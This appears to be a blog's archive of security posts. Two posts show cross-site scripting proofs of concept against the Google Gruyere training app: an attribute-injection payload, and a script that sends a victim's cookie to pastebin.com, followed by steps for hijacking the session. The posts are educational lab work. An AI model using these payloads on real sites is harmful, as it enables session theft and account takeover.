The (lack of) security at PayPal

18 June, 2011 § 2 Comments

PayPal has had a tough week in the news. Earlier this week, a user claimed to find a way to reset an arbitrary account’s password through the Forgot Password workflow. From his description, it seemed like a low-sophistication attack (aka something he accidentally stumbled upon).

Much of the reaction on Hacker News was to quickly remove your bank account from your PayPal so an attacker wouldn’t be able to steal your money.

As I saw the news, I quickly logged in to PayPal to remove my bank account. I had about $25 sitting in my PayPal account, so I decided to transfer the remaining funds to my bank account before disassociating it. Except it turns out when you do this you lock the association of your bank account for up to 3 to 4 days.

In the meantime, I decided to update the primary email address on the account to one that I check more often. I typed in my newer email address, they sent me a confirmation to the new email address, and I was done. Wait… I was done? It was that easy?

They never gave my older email address an opportunity to cancel this new primary email address. I logged in to my older email account and saw an email from PayPal saying that my primary email address had been changed and if this was a problem to call them. Huh?

So not only can someone claim a way to get access to any PayPal account, they can also change the primary email address of the account without giving the owner any opportunity to stop it before it’s too late?

PayPal needs to make a lot of changes

There is no way that I can cover all of the things that PayPal should do to protect their customers, but I can try a few.

First, they need to give account owners an opportunity to guard themselves against people changing crucial account information. It shouldn’t be so easy to add/remove an email address from the account.

Second, they need to advertise their Security Key feature (aka two-step authentication) more prominently. I didn’t know that they had one until I started writing this blog post.

Third, they should set up a secret passphrase that is included in all emails from them. The bank that I use does this, and it is a very low-tech but successful way to know if an email is from a phishing scam.

Fourth, it turned out that the security vulnerability the original user claimed wasn’t the security vulnerability that had been found. PayPal doesn’t require you to confirm your email address before you can continue with creating your account. Some user signed up with this guys email address and that is how he got access. None of this would be news if they required you to confirm your email address.

Last, PayPal needs to do a better job responding to these allegations. At least let people know that you are looking in to the issue.

XSS Prevention in GMail

28 February, 2011 § Leave a comment

Many popular web applications use JSON as their data interchange format. The format is very compact, easy for humans to read, and is based on a subset of JavaScript.

I’ll start by showing an example. Consider a website that wants its clients to query the server for the most recent 3 public messages. The client may send a GET query to the following address: https://mail.google.com/recent_messages/

The response can be written as follows:

var messages = [
   {"user": "foo", "m": "I like turtles", "t": 123423550},
   {"user": "bar", "m": "Turtle power!", "t": 1234543245},
   {"user": "baz", "m": "Cowabunga dude", "t": 1234567643}
];

When mail.google.com requests this JSON feed, it could then run eval() on the source code. Afterwards, it will have a messages object in global scope that it can reference.

This could work out good for GMail, but it can also allow other websites to make the same call. Modern web browsers will not allow asynchronous HTTP requests to cross domain boundaries, so it is easy to think that this is safe. However if the location is added as the src attribute of a script tag, then the browsers will load the content.

To work around this, GMail adds while(1); to the beginning of the JSON response.

When requesting JavaScript through a script tag’s src attribute, the DOM does not give access to modifying the content of the response. This keeps the while(1); present. If a client tries to eval() this JSON request, their browser will simply hang.

Pretty interesting, huh? There still are workarounds that can defeat this, such as setting up a server-side proxy that will make the request and strip the while(1).

If you’re looking for more details, Adobe Labs has a page on their website that covers Preventing the Execution of Unauthorized Script in JSON.

JavaScript Injection proof of concept

26 February, 2011 § Leave a comment

Following up from my previous post about XSS Session Hijacking in Google Gruyere, I decided to write a post covering a JavaScript injection vulnerability.

The color attribute on profiles lack input validation, and thus are susceptible to JavaScript injection. Simply put, this means that a user can edit their profile and insert code that will run on the computers of other users.

Some of the possible uses of this attack would be to:

  • Spam the user with advertisements
  • Increase visits to another website
  • Spread malware

In this proof of concept, I used the following as the “color” setting for my profile:

red' onmouseout='window.open("http://www.msu.edu/~weinjare/ad.html", "", "height=220,width=450");return false;

The JavaScript for the onmouseout event handler will launch a new popup window that could include spam. This code will be executed if the visitor moves their mouse over my username.

I’ll try to explain the source code above. The HTML that is generated for the page uses single quote characters to specify attributes. Adding a single quote to the setting, appearing after the word “red”, allows arbitrary HTML to be injected within the page. The following code is treated as another attribute for the element, adding an event handler for when a mouse moves on to the element and then leaves the element.

The value of the attribute starts with a single quote and lacks an ending quote. This is because the generation of the HTML will append a single quote to the value. This will allow the generated HTML to remain valid.

To show this in action, I created the following video:

XSS Session Hijacking proof of concept

17 February, 2011 § 6 Comments

I’ve been spending time lately playing with Google Gruyere. I first got introduced to it back when it was called Jarlsberg. After finding all the cross-site scripting vulnerabilities, I thought it would be cool to actually exploit them.

To this day, I had never exploited any of the holes I had found. When disclosing security vulnerabilities, I knew of the potential that a hole could bring with it. While it would be easy to convince myself of the necessity for a fix, I’ve learned it’s much harder to convince others. So I set out on implementing a proof-of-concept for one of the holes in Google Gruyere.

Gruyere allows users to add links to their homepage, however the application doesn’t sanitize the input. Try the following as your homepage and you’ll get a nice alert dialog:

javascript:alert(1)

To exploit this, I wrote the following JavaScript:

function a() {
var xhr =new XMLHttpRequest();
var params = 'paste_code=' + document.cookie + '&paste_name=XSS_poc';
xhr.open("POST","http://pastebin.com/api_public.php",true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.setRequestHeader("Content-length",params.length + "");
xhr.setRequestHeader("Connection","close");
xhr.send(params);
}
a();

I then used the Google Closure Compiler to compress this JavaScript by over 18% and achieved the final code as follows:

var a=new XMLHttpRequest,b="paste_code="+document.cookie+"&paste_name=XSS_poc";a.open("POST","http://pastebin.com/api_public.php",true);a.setRequestHeader("Content-type","application/x-www-form-urlencoded");a.setRequestHeader("Content-length",b.length+"");a.setRequestHeader("Connection","close");a.send(b);

Prefix the JavaScript code with `javascript:`, and you’re off to the races.

So how does this work? This JavaScript, when executed, will take the document’s cookie and send it to Pastebin.com. The attacker will then visit pastebin.com and find the cookie by searching for “XSS_poc” on Pastebin.

I then used a Google Chrome extension called Edit This Cookie to change my cookie to be that of the victim. Hitting Refresh on the page now showed that I was logged in as the victim :)

I recorded a video of the attack and have embedded it below. The music was created by Kevin MacLeod.

What do you think?

Weekend hacking: Homebrew security camera with infinite recording length

24 January, 2011 § 1 Comment

I’ve seen people use security cameras before. Most cameras are set up in a way where the user puts in a VHS tape, presses record, and repeats this process over. If something happened during the recording, the tape will be saved as evidence, otherwise it will be rewound and recorded over again.

This always seemed like a lot of work for something that is purely reactionary. Let’s look at the scenario again. The user is proactively doing a lot of work in the hopes that they will be able to react. Put another way, if you make 20 dollars an hour, over a given month you might spend five or six hours rewinding and pressing record. If there is less than 100 dollars of damage caught on tape, then it wasn’t worth it.

So how about a different solution? At midnight on Friday I decided I would find something better. I had in mind a security camera that kept a circular buffer of the last 8 or so hours. If nothing happened then it would just overwrite what it had previously recorded.

Unfortunately I had no luck finding such a program on the internet, so I decided to write one myself. I first came across OpenCV, which is a free computer vision library. OpenCV is really powerful (and might be a lot of work). I sure didn’t want to write this in C++. Luckily I found technobabbler’s tutorial on how to make a simple webcam application using Python.

I followed the tutorial and had a simple application running that could save a snapshot from the webcam with a simple click of a button. By 4:30am I had a working prototype that was doing just what I wanted.

Using Python 2.5, VideoCapturePILpygame, and FFmpeg, I am able to keep the last 24-hours of snapshots (at 10 frames per second). If I ever want to save those 24 hours for reference, I simply hit the letter ‘s’ on the keyboard.

I’ve made this script open-source under the GPL license and hosted it at Google Code. Let me know what you think.

Finding how a header file gets included

6 May, 2010 § 2 Comments

Have you ever had a header file generate warnings that is not explicitly part of your Visual Studio solution?

Recently I’ve been working on fixing static analysis warnings reported by Microsoft’s PREfast static analysis tool for C++. I ran in to an issue though with some of the Microsoft Windows SDK v6.0 headers. One file, aptly named `strsafe.h`, can be the cause for tons of warnings in a build.

I looked around and found that the Windows SDK team is fully aware of the problem. They recommend wrapping the include for strsafe.h with pragmas, like so:

#include <CodeAnalysis/warnings.h>
#pragma warning(push)
#pragma warning(disable: ALL_CODE_ANALYSIS_WARNINGS)
#include <strsafe.h>
#pragma warning(pop)

So the first thing I did was to search through my code and find out who what included strsafe.h. But it turns out that no file explicitly included it. I figured that it must get included from another include file.

To find out what files are included in your build, you can turn on /showIncludes through the Project Properties ➨ Configuration Properties ➨ C/C++ ➨ Advanced ➨ Show Includes

/showIncludes prints out a tree of all of the files that get included in when the project is built. Using this, I was able to find which SDK files we included that ended up including strsafe.h.

This process took me about a half hour in total from turning the compiler flag on, performing a rebuild, narrowing down the includes, and wrapping them with pragmas. I still got a nasty taste in my mouth for suppressing the warnings, but getting rid of them cut out a lot of noise surrounding actual warnings that are more pressing.

Why Phishing Works

30 April, 2009 § Leave a comment

I just read a paper written in 2006 about why phishing works. Some of the notable comments in it come from participants in the usability study that was done:

From users who looked at security indicators in website content only:

“I never look at the numbers and letters up there [in the address bar]. I’m not sure what they are supposed to say.”

From users who looked at content and domain name only:

Many did not know what an IP address was, they referred to one as a “redirector address”, a “router number”, “ISP number”, “those number thingies in front of the name.”

From users who looked at all of the above and also for HTTPS in the address:
  • One never noticed the padlock in the browser chrome.
  • One stated that favicons in address bars indicate authenticity better than a padlock because they “cannot be copied.”
From users who looked for a padlock icon:

Some participants gave more credence to padlock icons that appeared within the content of the page as opposed to the browser chrome.

Other notes from the reading:

One user mentioned that she verifies the authenticity of a website by trying to log in to the website and seeing if it will work. She said, What’s the harm? Passwords are not dangerous to give out, like financial information.

One of the last tests had the users look at a phishing site that was a direct copy of a real site. The site included an animated graphic of a bear and produced the following responses:

  • The “cute” design was a convincing factor of a legitimate website.
  • Two participants specifically mentioned the bear graphic, “because that would take a lot of effort to copy”.

Many found the animation appealing and reloaded the page multiple times just to see the animation again.

And the last, but not least. When encountering a website with an invalid SSL certificate, the users accepted it and had these quotes:

“I accepted the use of cookies”, “It asked me if I wanted to save my password on forms”, “It was a message from the website about spyware”

Interesting quotes. I’m not sure how to deal with solving this problem. One solution could be to understand what users assume to be secure and simply design towards that.

Where Am I?

You are currently browsing entries tagged with security at JAWS.

Follow

Get every new post delivered to your Inbox.

Join 1,004 other followers